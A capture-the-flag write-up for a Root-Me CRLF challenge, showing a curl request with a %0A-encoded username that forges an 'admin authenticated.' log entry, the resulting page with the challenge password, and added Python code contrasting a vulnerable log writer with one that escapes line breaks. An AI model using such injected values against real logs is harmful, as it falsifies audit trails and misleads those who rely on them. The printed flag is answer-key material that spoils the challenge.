Rootme CRLF
We need to inject false data in the journalisation log. This challenge is not very clear though. It doesn’t say how exactly we’re supposed to get the flag.
CRLF stands for Carriage Return Line Feed. It’s basically going to the next line in text. The challenge page shows a login and password input box with the Authentication log.
If we try to log in with admin:admin
we generate the following log:
admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.
Let’s try logging in with 12345:12345
admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.
12345 failed to authenticate.
So if we log in with admin authenticated:12345
we should be getting “admin authenticated failed to authenticate”
admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.
12345 failed to authenticate.
admin authenticated failed to authenticate.
So let’s input a carriage return after our login and reproduce the “admin
authenticated” message. We’ll use a login with either %0A or %0D to do the
line feed/carriage return and create a “fake log”. The login will be
admin authenticated.%0ARandom user:12344
After trying a few times I noticed that the login will not convert any type of character. So we’ll have to do it via the URL
curl 'http://challenge01.root-me.org/web-serveur/ch14/?username=admin+authenticated.%0AUser&password=12345'
...
<fieldset><legend>Authentication log</legend><pre>admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin authenticated.
User failed to authenticate.
</pre></fieldset><h3>Well done, you can validate challenge with this password : rFSP&G0p&5uAg1%</h3></body></html>
We got our password.
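The same bug from the logging side, as an added example that is not part of the original write-up or the challenge's code: a log writer that escapes line breaks in the username before appending, so the request above produces one entry instead of two. The function names and the escaping scheme are assumptions, since the server code is not shown on the page.

```python
from urllib.parse import parse_qs

# Constructed input: the query string from the write-up's request.
SAMPLE_QUERY = "username=admin+authenticated.%0AUser&password=12345"

# Line separators outside the ASCII control range that str.splitlines()
# and many log viewers also treat as a new line.
EXTRA_BREAKS = "\x85\u2028\u2029"


def log_line_vulnerable(username):
    """Behaviour observed in the challenge: raw input is written to the log."""
    return f"{username} failed to authenticate.\n"


def neutralize(value):
    """Escape the backslash first, then every control char and line separator."""
    out = []
    for ch in value:
        if ch == "\\":
            out.append("\\\\")  # keeps the escaping unambiguous
        elif ord(ch) < 0x20 or ord(ch) == 0x7F or ch in EXTRA_BREAKS:
            out.append(f"\\u{ord(ch):04x}")  # e.g. LF becomes \u000a
        else:
            out.append(ch)
    return "".join(out)


def log_line_hardened(username):
    """Hypothetical fixed writer: one request always yields one log entry."""
    return f"{neutralize(username)} failed to authenticate.\n"


def count_entries(log_text):
    return len(log_text.splitlines())


def demo():
    # parse_qs decodes '+' to a space and %0A to a line feed, as the server does.
    username = parse_qs(SAMPLE_QUERY)["username"][0]
    return (count_entries(log_line_vulnerable(username)),
            count_entries(log_line_hardened(username)))


if __name__ == "__main__":
    print(demo())
```

With the hardened writer the injected text stays visible in the log as an escaped sequence on a single line, which also makes the attempt easy to spot during review.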